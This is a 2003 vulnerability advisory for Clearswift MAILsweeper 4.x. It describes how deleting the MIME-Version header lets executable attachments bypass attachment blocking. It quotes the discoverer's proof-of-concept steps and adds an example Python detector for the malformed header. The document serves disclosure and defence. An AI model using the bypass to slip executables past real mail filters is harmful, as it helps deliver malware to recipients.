A vulnerability exists in Clearswift’s MAILsweeper 4.x that could result in the bypass of the attachment blocking feature on the vulnerable server.
March 10, 2003
Reported March 3, 2003, by Martin O’Neal.
VERSIONS AFFECTED
Clearswift MAILsweeper 4.x for Windows NT/2000
DESCRIPTION
A vulnerability exists in Clearswift’s MAILsweeper 4.x that could result in the bypass of the attachment blocking feature on the vulnerable server. If a deliberately malformed MIME encapsulation technique is used, the MAILsweeper product will not recognize the attachment and will allow it to pass.
DEMONSTRATION
The discoverer posted the following steps as proof of concept:
-- Proof of concept --
For this proof of concept, the MIME encapsulation is simply modified to
remove the MIME-Version header field. An example of an application that
will process a MIME construct that is malformed in this way is Microsoft Internet Explorer.
Whilst RFC2045 states that all agents must include this field [2] it
then goes on to say that "In the absence of a MIME-Version field, a
receiving mail user agent (whether conforming to MIME requirements or
not) may optionally choose to interpret the body of the message
according to local conventions."
Step 1: On the MAILsweeper host create a new Data Type Manager with only the Executable type selected. Save and restart the MAILsweeper Security service.
Step 2: Now create a text file that will be used to hold the MIME
encoded attachment. Start notepad (or another text editor), and paste
in:
MIME-Version: 1.0
Content-Location:file:///executable.exe
Content-Transfer-Encoding: base64
Step 3: To reproduce this issue, send an email containing the attachment created in step 2 that will be processed by the scenario from step 1. This should result in a successful discovery condition.
Step 4: Reopen the attachment from step 2 and remove the first line
(MIME-Version: 1.0), then resend the attachment as per step 3. This
should result in the attachment not being spotted as an executable.
VENDOR RESPONSE
The vendor, Clearswift, has made an updated script utility available that can detect the malformed MIME header used in this vulnerability. As a workaround, this should be implemented until a fix or patch is available.
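The kind of check such a detection script could perform, shown as an added example (it is not Clearswift's utility and not code from the advisory): flag MIME headers that arrive without MIME-Version, and decode the body anyway before type-checking it. The function name `inspect_entity` and the sample messages are constructed for illustration.

```python
import base64
from email import message_from_string

# Headers that only have meaning when the body is MIME-encoded.
MIME_ONLY_HEADERS = ("Content-Type", "Content-Transfer-Encoding",
                     "Content-Location", "Content-Disposition")

def inspect_entity(raw: str) -> dict:
    """Classify a message the way a fail-closed content filter should."""
    msg = message_from_string(raw)
    # MIME headers without MIME-Version: the malformation from the advisory.
    malformed = msg["MIME-Version"] is None and any(
        msg[h] is not None for h in MIME_ONLY_HEADERS)
    executable = False
    for part in msg.walk():
        if part.is_multipart():
            continue
        # Python's email package decodes by Content-Transfer-Encoding whether
        # or not MIME-Version is present, as a lenient client might.
        data = part.get_payload(decode=True) or b""
        if data[:2] == b"MZ":  # DOS/PE executable magic
            executable = True
    return {"malformed_mime": malformed, "executable": executable,
            "block": malformed or executable}

# Constructed sample data: 32 placeholder bytes with an MZ magic, not a real program.
_BODY = base64.b64encode(b"MZ" + bytes(30)).decode()
_HEADERS = ("Content-Location: file:///executable.exe\n"
            "Content-Transfer-Encoding: base64\n\n")
WITH_VERSION = "MIME-Version: 1.0\n" + _HEADERS + _BODY + "\n"
WITHOUT_VERSION = _HEADERS + _BODY + "\n"
PLAIN = "Subject: hello\n\nJust a text note.\n"

if __name__ == "__main__":
    for name, raw in (("with MIME-Version", WITH_VERSION),
                      ("without MIME-Version", WITHOUT_VERSION),
                      ("plain text", PLAIN)):
        print(name, inspect_entity(raw))
```

The filter's decision no longer depends on MIME-Version: the executable is recognized in both forms, and the form with the header stripped is additionally flagged as malformed.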
CREDIT
Discovered by Martin O'Neal.